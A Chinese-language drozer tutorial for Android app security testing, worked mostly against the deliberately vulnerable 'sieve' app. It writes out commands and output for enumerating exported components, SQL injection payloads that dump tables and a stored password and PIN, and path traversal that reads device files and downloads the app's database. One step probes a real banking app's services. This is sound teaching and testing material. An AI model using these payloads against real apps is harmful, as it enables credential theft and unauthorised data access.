Github Drozer
drozer guide

安装

  1. 安装drozer-agent-x.x.x.apk并开启服务,服务默认监听31415端口。
  2. 通过adb forward 转发31415端口:adb forward tcp:31415 tcp:31415
  3. 通过drozer console connect连接设备。

使用

1. 获取获取Android设备上的所有的安装的App的包名

run app.package.list,也可以通过-f key增加关键词过滤run app.package.list -f sieve

2. 获取某个应用的基本信息,参数为程序包名

run app.package.info -a packageName

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
> dz> run app.package.info -a com.mwr.example.sieve
Package: com.mwr.example.sieve
Process Name: com.mwr.example.sieve
Version: 1.0
Data Directory: /data/data/com.mwr.example.sieve
APK Path: /data/app/com.mwr.example.sieve-2.apk
UID: 10056
GID: [1028, 1015, 3003]
Shared Libraries: null
Shared User ID: null
Uses Permissions:
 - android.permission.READ_EXTERNAL_STORAGE
 - android.permission.WRITE_EXTERNAL_STORAGE
 - android.permission.INTERNET
Defines Permissions:
 - com.mwr.example.sieve.READ_KEYS
 - com.mwr.example.sieve.WRITE_KEYS

可以看到应用的版本信息,数据存储的目录,用户ID,组ID,是否有共享库,还有权限信息等。

3. 确定攻击面(Itentify The Attack Surface)

run app.package.attacksurface packageName

1
2
3
4
5
6
7
    > dz> run app.activity.info -a  com.mwr.example.sieve
Attack Surface:
 3 activities exported
 0 broadcast receivers exported
 2 content providers exported
 2 services exported
 is debuggable

显示了潜在可以利用的组件个数: “exported”表示组件可以被其他App使用。 services is debuggable表示我们可以用adb绑定一个调试器到进程

4. 进一步获取Attack Surface的信息

run app.activity.info -a packageName

1
2
3
4
5
> dz> run app.activity.info -a com.mwr.example.sieve
Package: com.mwr.example.sieve
 com.mwr.example.sieve.FileSelectActivity
 com.mwr.example.sieve.MainLoginActivity
 com.mwr.example.sieve.PWList

5. 启动Activities

run app.activity.start --component packageName activityName

1
2
3
4
5
6
7
8
9
10
>dz> run app.activity.start --component
com.mwr.example.sieve com.mwr.example.sieve.PWList

    >dz> help app.activity.start
usage: run app.activity.start [-h] [--action ACTION] [--category CATEGORY [CATEGORY ...]]
              [--component PACKAGE COMPONENT] [--data-uri DATA_URI]
              [--extra TYPE KEY VALUE] [--flags FLAGS [FLAGS ...]]
              [--mimetype MIMETYPE]

    Starts an Activity using the formulated intent.

6. 从Content Provider中获取信息

run app.provider.info -a packageName

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
> dz> run app.provider.info -a com.mwr.example.sieve
Package: com.mwr.example.sieve
 Authority: com.mwr.example.sieve.DBContentProvider
 Read Permission: null
 Write Permission: null
 Content Provider: com.mwr.example.sieve.DBContentProvider
 Multiprocess Allowed: True
 Grant Uri Permissions: False
 Path Permissions:
 Path: /Keys
 Type: PATTERN_LITERAL
 Read Permission: com.mwr.example.sieve.READ_KEYS
 Write Permission: com.mwr.example.sieve.WRITE_KEYS
 Authority: com.mwr.example.sieve.FileBackupProvider
 Read Permission: null
 Write Permission: null
 Content Provider: com.mwr.example.sieve.FileBackupProvider
 Multiprocess Allowed: True
 Grant Uri Permissions: False

两个exported的content provider的具体信息,包括名字,权限,访问路径等。

7. 查找可以访问Content Provider的URI(数据泄漏)

run scanner.provider.finduris -a packageName

1
2
3
4
5
6
7
8
9
> dz> run scanner.provider.finduris -a com.mwr.example.sieve
Scanning com.mwr.example.sieve...
Unable to Query content://com.mwr.example.sieve.DBContentProvider/
...
Unable to Query content://com.mwr.example.sieve.DBContentProvider/Keys
Accessible content URIs:
 content://com.mwr.example.sieve.DBContentProvider/Keys/
 content://com.mwr.example.sieve.DBContentProvider/Passwords
 content://com.mwr.example.sieve.DBContentProvider/Passwords/
检测出了可以访问content的URI,接下来我们可以用drozer的其他模块和URI从content中获取,甚至更改信息

1
2
3
4
5
6
7
> dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/
--vertical
 _id: 1
 service: Email
 username: incognitoguy50
 password: PSFjqXIMVa5NJFudgDuuLVgJYFD+8w== (Base64-encoded)
 email: incognitoguy50@gmail.com
获取了用户名,邮箱帐号,和Base64编码的密码字符串

8. SQL注入

1
2
3
4
5
6
7
8
9
> dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/
--projection "'"
unrecognized token: "' FROM Passwords" (code 1): , while compiling: SELECT ' 
FROM Passwords
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/
--selection "'"
unrecognized token: "')" (code 1): , while compiling: SELECT * FROM Passwords
WHERE (')
    
命令执行后Android设备返回了非常详细的错误信息

9. 使用Sql注入列出数据库中的所有数据表

1
2
3
4
5
6
7
8
9
10
11
> dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/
--projection "* FROM SQLITE_MASTER WHERE type='table';--"
| type | name | tbl_name | rootpage | sql |
| table | android_metadata | android_metadata | 3 | CREATE TABLE ... |
| table | Passwords | Passwords | 4 | CREATE TABLE ... |
| table | Key | Key | 5 | CREATE TABLE ... |
> 
> dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/
--projection "* FROM Key;--"
| Password | pin |
| thisismypassword | 9876 |

10. 从File System-Backed Content Providers获取信息

File System-backed Content Provider提供了访问底层文件系统的方法,Android沙盒会阻止App共享文件允许,而File System-backed Content Provider允许App共享文件。 对于sieve来说,我们可以推测出的FileBackupProvider就是一个file system-backed content provider。 我们可以使用drozer的app.provider.read模块查看某个文件或者下载文件。

dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
127.0.0.1 localhost
dz> run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data
/data/com.mwr.example.sieve/databases/database.db /home/user/database.db

11. 检查Content Provider的脆弱性

检查是否有sql注入 run scanner.provider.injection -a packageName
检查是否存在遍历文件的漏洞 run scanner.provider.traversal -a packageName

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
> dz> run scanner.provider.injection -a com.mwr.example.sieve
Scanning com.mwr.example.sieve...
Injection in Projection:
 content://com.mwr.example.sieve.DBContentProvider/Keys/
 content://com.mwr.example.sieve.DBContentProvider/Passwords
 content://com.mwr.example.sieve.DBContentProvider/Passwords/
Injection in Selection:
 content://com.mwr.example.sieve.DBContentProvider/Keys/
 content://com.mwr.example.sieve.DBContentProvider/Passwords
 content://com.mwr.example.sieve.DBContentProvider/Passwords/
dz> run scanner.provider.traversal -a com.mwr.example.sieve
Scanning com.mwr.example.sieve...
Vulnerable Providers:
 content://com.mwr.example.sieve.FileBackupProvider/
 content://com.mwr.example.sieve.FileBackupProvider

12. 和Services交互

获取是exported状态的services的命令 run app.service.info -a packeageName

1
2
3
4
> dz> run app.service.info -a com.bank.pingan
Package: com.bank.pingan
  com.pingan.bank.apps.cejmodule.services.StatisticsService
    Permission: null

13. 向某个服务发送信息

run app.service.send packageName serviceName --msg 1 5 3

14. 其他常用模块

1
2
3
shell.start 在Android设备上开启一个交互式Linux Shell
tools.file.upload / tools.file.download
tools.setup.busybox / tools.setup.minimalsu 安装busybox或者minimalsu到Android设备上